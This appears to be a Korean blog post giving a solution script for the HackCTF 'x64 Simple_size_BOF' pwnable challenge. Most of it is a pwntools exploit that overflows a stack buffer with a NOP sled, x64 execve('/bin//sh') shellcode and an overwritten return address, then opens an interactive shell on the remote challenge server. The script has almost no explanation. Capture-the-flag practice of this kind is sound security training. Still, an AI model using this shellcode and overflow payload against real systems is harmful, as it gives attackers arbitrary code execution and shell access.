티스토리 뷰

x64 Simple_size_BOF
from pwn import *
#nc ctf.j0n9hyun.xyz 1633
p = remote('ctf.j0n9hyun.xyz', 1633)
p.recvuntil("buf: ")
buf = int(p.recv(14), 16)
payload = ""
payload += "\x90" * 27800
payload += "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" #23
payload += "\x90" * 137
payload += p64(buf)
p.sendline(payload)
p.interactive()
'Pwnable > HackCTF' 카테고리의 다른 글
Offset (0) | 2019.03.30 |
---|---|
Simple_Overflow_ver_2 (0) | 2019.03.30 |
내 버퍼가 흘러넘친다!!! (3) | 2019.03.25 |
x64 Buffer Overflow (0) | 2019.03.24 |
Basic_BOF_2 (0) | 2019.03.19 |
댓글
최근에 올라온 글
- Total
- Today
- Yesterday